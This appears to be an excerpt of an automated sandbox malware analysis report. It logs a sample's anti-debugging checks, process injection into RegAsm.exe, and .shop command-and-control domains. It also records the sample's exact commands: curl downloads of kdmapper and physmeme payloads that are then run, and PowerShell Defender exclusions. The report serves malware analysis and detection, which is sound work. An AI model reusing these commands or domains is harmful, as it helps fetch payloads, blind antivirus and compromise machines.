                                Source: curl.exe, 00000004.00000003.1488223369.00000288C36F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt
                                Source: w32tm.exe, 0000002E.00000002.1868824612.000002DCAFA97000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
                                Source: C:\Windows\Speech\kdmapper.exeAPI call chain: ExitProcess graph end nodegraph_5-23816
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess information queried: ProcessInformationJump to behavior

                                Anti Debugging

                                barindex
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B4BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF68B4B4BD0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeThread information set: HideFromDebuggerJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeOpen window title or class name: ollydbg
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeOpen window title or class name: windbgframeclass
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeOpen window title or class name: ollydbg.exe
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess queried: DebugPortJump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00446730 LdrInitializeThunk,11_2_00446730
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B4BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF68B4B4BD0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B4BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF68B4B4BD0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B4BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF68B4B4BD0
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_00177DEE mov eax, dword ptr fs:[00000030h]5_2_00177DEE
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4B4BD0 IsDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,CheckRemoteDebuggerPresent,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,memset,GetCurrentThread,GetThreadContext,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,memset,VirtualFree,SetLastError,GetLastError,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualFree,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,OpenThread,LoadLibraryA,GetProcAddress,NtSetInformationThread,CloseHandle,Thread32Next,CloseHandle,GetTickCount,GetTickCount,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,GetProcessHeap,HeapSetInformation,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,VirtualAlloc,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,exit,0_2_00007FF68B4B4BD0
                                Source: C:\Edge\msedge.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                                Source: C:\Edge\msedge.exeProcess token adjusted: Debug
                                Source: C:\Edge\msedge.exeProcess token adjusted: Debug
                                Source: C:\Edge\msedge.exeProcess token adjusted: Debug
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess token adjusted: Debug
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4CB6F0 SetUnhandledExceptionFilter,0_2_00007FF68B4CB6F0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4CB548 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF68B4CB548
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4CADF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF68B4CADF8
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0016F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0016F838
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0016F9D5 SetUnhandledExceptionFilter,5_2_0016F9D5
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_0016FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_0016FBCA
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 5_2_00178EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00178EBD
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe'
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                                Source: C:\Windows\Speech\physmeme.exeCode function: 9_2_02852129 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,9_2_02852129
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5AJump to behavior
                                Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: strappystyio.shop
                                Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: coursedonnyre.shop
                                Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: fossillargeiw.shop
                                Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tendencerangej.shop
                                Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: appleboltelwk.shop
                                Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tearrybyiwo.shop
                                Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: captainynfanw.shop
                                Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: surveriysiop.shop
                                Source: physmeme.exe, 00000009.00000002.1520275902.0000000003855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: tiddymarktwo.shop
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44C000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 44F000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 45F000Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: A64008Jump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeCode function: 0_2_00007FF68B4BECD0 pow,pow,pow,sqrt,mouse_event,mouse_event,_invalid_parameter_noinfo_noreturn,0_2_00007FF68B4BECD0
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess created: C:\Windows\Speech\kdmapper.exe "C:\Windows\Speech\kdmapper.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Users\user\Desktop\4tXm5yPtiy.exeProcess created: C:\Windows\Speech\physmeme.exe "C:\Windows\Speech\physmeme.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/kdmapper.bin --output C:\Windows\Speech\kdmapper.exeJump to behavior
                                Source: C:\Windows\Speech\kdmapper.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Edge\L6lFlVnd0szYUYb26bZc.vbe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl --silent https://file.garden/ZmE_ziOgiFXI9Y48/physmeme.bin --output C:\Windows\Speech\physmeme.exeJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Edge\mikZxAokT1te3xOwV8iiWp5ACQVlwzi0DAV4VCgjFc4vhg.bat" "Jump to behavior
                                Source: C:\Windows\Speech\physmeme.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Edge\msedge.exe "C:\Edge/msedge.exe"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\srvpqulv\srvpqulv.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c1gtejqg\c1gtejqg.cmdline"Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'Jump to behavior
                                Source: C:\Edge\msedge.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zugvBzMsRZ.bat" Jump to behavior
                                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3594.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSCF5F43EE1A3D5479687C855494E4EF77.TMP"
                                Source: C:\Users\user\AppData\Local\wCnmgKwwXYQbWeNvWeCCOp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\qFKlxXtZuP.bat"
